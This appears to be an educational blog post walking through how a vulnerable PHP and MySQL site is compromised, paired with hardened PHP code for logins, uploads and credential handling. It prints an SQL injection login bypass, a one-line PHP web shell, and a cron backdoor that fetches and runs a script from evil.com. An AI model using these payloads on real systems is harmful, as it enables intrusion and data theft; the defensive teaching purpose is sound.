Sunday, April 5, 2026 • Sachin Prajapati

How Hackers Compromise Vulnerable PHP Websites (Recon to Database Theft)

Below is a high-level educational simulation showing how an attacker might compromise a vulnerable website built with PHP.
This type of scenario is commonly practiced in cybersecurity labs and training platforms to understand how vulnerabilities lead to full compromise and how defenders can stop them.

⚠️ The purpose is defensive learning so developers and administrators can secure systems.


Scenario Overview

Target: A vulnerable PHP website running on Apache HTTP Server with a MySQL database.

The attacker’s goal:

Recon → Find vulnerability → Gain access → Execute commands → Access database → Steal data

Stage 1 — Reconnaissance (Finding Technology)

The attacker begins by gathering information about the website.

Checking HTTP headers

Response headers might reveal:

Server: Apache
X-Powered-By: PHP/8.0

Now the attacker knows:

  • Web server: Apache

  • Language: PHP

  • Likely database: MySQL

This information helps identify potential weaknesses.

Defensive lesson

Disable technology disclosure in php.ini:

expose_php = Off

Stage 2 — Discover Hidden Pages

Attackers try to discover hidden directories by guessing common names.

Example guesses:

/admin
/uploads
/backup
/config

They may use automated tools such as:

  • Gobuster

  • DirBuster

Suppose the attacker discovers:

/admin/login.php
/uploads/

Stage 3 — Information Leakage

The attacker intentionally causes an error.

Example request:

https://site.com/product.php?id='

The site returns an error:

Warning: mysqli_query() in /var/www/html/product.php line 22

This reveals:

/var/www/html/

The attacker now knows the web root path on the server.

Defensive lesson

Disable error display in php.ini:

display_errors = Off

Stage 4 — SQL Injection Discovery

The attacker tests inputs for SQL injection.

Example login input:

Username: admin
Password: ' OR '1'='1

If the login succeeds, the query was most likely built by string concatenation, giving:

SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'

Because AND binds tighter than OR, the WHERE clause reads (username='admin' AND password='') OR ('1'='1'); the second half is always true, so every row matches and authentication is bypassed.

Result

The attacker logs in as admin.

Defensive lesson

Use prepared statements in PHP.
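As an added example (not code from the original post), the concatenated login query from above sits beside a hardened version that uses mysqli prepared statements and never compares plaintext passwords. The table and column names (users, username, password_hash), the shop_app account and the placeholder password are assumptions.

```php
<?php
// Added example, not from the original post. Assumed schema:
//   users(id, username, password_hash)

// VULNERABLE: input is pasted into the SQL text. The password ' OR '1'='1
// turns the WHERE clause into  username='admin' AND password='' OR '1'='1'
// which matches every row because AND binds tighter than OR.
function loginVulnerable(mysqli $db, string $user, string $pass): bool
{
    $sql    = "SELECT id FROM users WHERE username='$user' AND password='$pass'";
    $result = $db->query($sql);
    return $result !== false && $result->num_rows > 0;
}

// HARDENED: the SQL text is fixed and the username travels as a bound
// parameter, so quotes inside it are data, never SQL. Only the bcrypt hash
// is fetched and checked with password_verify(); the password itself is
// never part of any query.
function loginSafe(mysqli $db, string $user, string $pass): bool
{
    // Hash computed once so a missing user costs the same time as a wrong
    // password (no username enumeration through response timing).
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('dummy-password', PASSWORD_DEFAULT);
    }

    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $stmt->bind_result($hash);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found) {
        password_verify($pass, $dummyHash);
        return false;
    }
    return password_verify($pass, $hash);
}

// Account creation stores a hash, never the plaintext password.
function createUser(mysqli $db, string $user, string $pass): void
{
    $hash = password_hash($pass, PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
    $stmt->bind_param('ss', $user, $hash);
    $stmt->execute();
    $stmt->close();
}

// Usage (assumes a MySQL server reachable with these placeholder credentials):
// $db = new mysqli('localhost', 'shop_app', 'CHANGE_ME', 'shop');
// $db->set_charset('utf8mb4');
// createUser($db, 'admin', 'correct horse battery staple');
// loginSafe($db, 'admin', "' OR '1'='1");   // false: the quote is just a character
```

With the bound parameter, the injected string is looked up as a literal username and no row matches; the comparison then happens in password_verify(), not in SQL, so the database never sees a password at all.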


Stage 5 — File Upload Vulnerability

Inside the admin panel there is a feature:

Upload product image

The attacker uploads a malicious file:

shell.php

Example malicious script:

<?php system($_GET['cmd']); ?>

The file is stored in:

/uploads/shell.php

Now the attacker visits:

site.com/uploads/shell.php?cmd=whoami

Server response:

www-data

This confirms command execution.
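As an added example (not code from the original post), here is how the "Upload product image" feature can be written so that shell.php never reaches the uploads directory as executable PHP. The upload path, the form field name, the size limit and the constant names are assumptions.

```php
<?php
// Added example, not from the original post. Assumptions: uploads are stored
// under UPLOAD_DIR (outside the document root) and served by a separate
// read-only handler; the form field is named 'image'.

const UPLOAD_DIR = '/var/www/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;

// The only content types accepted, each mapped to the extension the server
// will assign. The extension never comes from the client's filename, so
// "shell.php" or "shell.php.jpg" cannot land on disk with a .php suffix.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function storeProductImage(array $file): string
{
    // 1. The transfer itself must have succeeded and be a real upload.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 2. Sniff the real content type from the bytes. $file['type'] and the
    //    filename extension are both chosen by the client and mean nothing.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('unsupported file type');
    }

    // 3. The bytes must decode as an image; a PHP script with a forged
    //    header fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // 4. Server-chosen random name with an allowlisted extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);   // readable, never executable
    return $name;
}

// Usage inside the admin form handler:
// $storedName = storeProductImage($_FILES['image']);
```

Even a genuine image can carry PHP code in its metadata, so content checks alone are not the last line of defence: the directory that holds uploads must never execute PHP. Keeping it outside the document root (as the constant above assumes) achieves that; under Apache with mod_php the same effect comes from setting `php_admin_flag engine off` for that directory.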


Stage 6 — Remote Command Execution

The attacker now has a web shell.

Example commands executed:

ls
pwd
cat /etc/passwd

The attacker explores the server.

Typical findings:

config.php
database.php
.env

Stage 7 — Database Credential Theft

The attacker reads a configuration file (config.php, or the .env file found above):

config.php

Example contents (in .env style):

DB_HOST=localhost
DB_USER=root
DB_PASS=password123
DB_NAME=shop

Now the attacker has database credentials.
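A config file under the web root, readable by every account on the box, and holding the MySQL root password is what makes Stage 7 a one-line win. As an added example (not from the original post), the loader below refuses to start unless the credentials file lives outside the document root, is readable by its owner only, and names a non-root database account. The path /etc/shop/db.php, the shop_app user and the array keys are assumptions; the same checks apply to a .env file.

```php
<?php
// Added example, not from the original post. The config file is plain PHP
// that returns an array:
//   <?php return ['host' => 'localhost', 'user' => 'shop_app',
//                 'pass' => 'CHANGE_ME', 'name' => 'shop'];

const DB_CONFIG_PATH = '/etc/shop/db.php';   // assumed location, outside /var/www

function loadDbConfig(string $path = DB_CONFIG_PATH): array
{
    $real = realpath($path);
    if ($real === false) {
        throw new RuntimeException('database config not found');
    }

    // Anything under the document root can be served or leaked by the web
    // server (Stage 3 disclosed the path; Stage 6 read the file).
    $docRoot = realpath($_SERVER['DOCUMENT_ROOT'] ?? '/var/www/html');
    if ($docRoot !== false && str_starts_with($real, $docRoot . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('database config must live outside the web root');
    }

    // Group- or world-readable secrets turn any local account into database
    // access. Require owner-only permissions (no bits set in the 0077 mask).
    if ((fileperms($real) & 0077) !== 0) {
        throw new RuntimeException('database config is readable by other users');
    }

    $cfg = require $real;
    foreach (['host', 'user', 'pass', 'name'] as $k) {
        if (empty($cfg[$k])) {
            throw new RuntimeException("database config missing '$k'");
        }
    }
    // The application must never run as the MySQL root account.
    if ($cfg['user'] === 'root') {
        throw new RuntimeException('refusing to connect as MySQL root');
    }
    return $cfg;
}

function connectDb(): mysqli
{
    $c  = loadDbConfig();
    $db = new mysqli($c['host'], $c['user'], $c['pass'], $c['name']);
    $db->set_charset('utf8mb4');
    return $db;
}
```

The refusal to use root only matters if the shop_app account is actually limited on the MySQL side: grant it SELECT, INSERT and UPDATE on the shop tables and nothing more, so stolen credentials cannot read other databases or write files on the server.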


Stage 8 — Database Access

Using the stolen credentials, the attacker connects to the database.

Example tables:

users
orders
payments
admins

The attacker extracts user data such as:

emails
password hashes
addresses
payment records

This is data exfiltration.


Stage 9 — Privilege Escalation

The attacker tries to gain full server control.

They search for:

sudo misconfigurations
vulnerable services
weak permissions

If successful:

www-data → root

Now they control the entire system.


Stage 10 — Persistence (Backdoors)

To maintain access, the attacker installs backdoors.

Examples:

hidden PHP shells
cron jobs
reverse shells

Example cron job:

*/5 * * * * curl http://evil.com/backdoor.sh | bash

The attacker can now return anytime.


Stage 11 — Data Theft & Abuse

The attacker may now:

  • steal customer databases

  • sell credentials

  • send spam emails

  • launch botnet attacks

  • mine cryptocurrency

The website owner may not notice immediately.


Full Attack Chain Visualization

1. Recon (identify PHP + Apache)
2. Discover hidden directories
3. Trigger error messages
4. Find SQL injection
5. Login as admin
6. Upload web shell
7. Execute server commands
8. Read config files
9. Steal database credentials
10. Dump database
11. Install backdoors

How Proper Security Stops This Attack

Attack step          Defense
-------------------  -------------------------------
Recon                hide PHP version
Error leaks          disable display_errors
SQL injection        prepared statements
File upload shell    restrict file types
Command execution    disable dangerous functions
File access          open_basedir restriction
Database theft       environment variable protection

Real-World Lesson

Many large platforms run safely on PHP, including:

  • WordPress

  • Drupal

  • Laravel

Security depends mostly on:

  • proper configuration

  • secure coding practices

  • regular penetration testing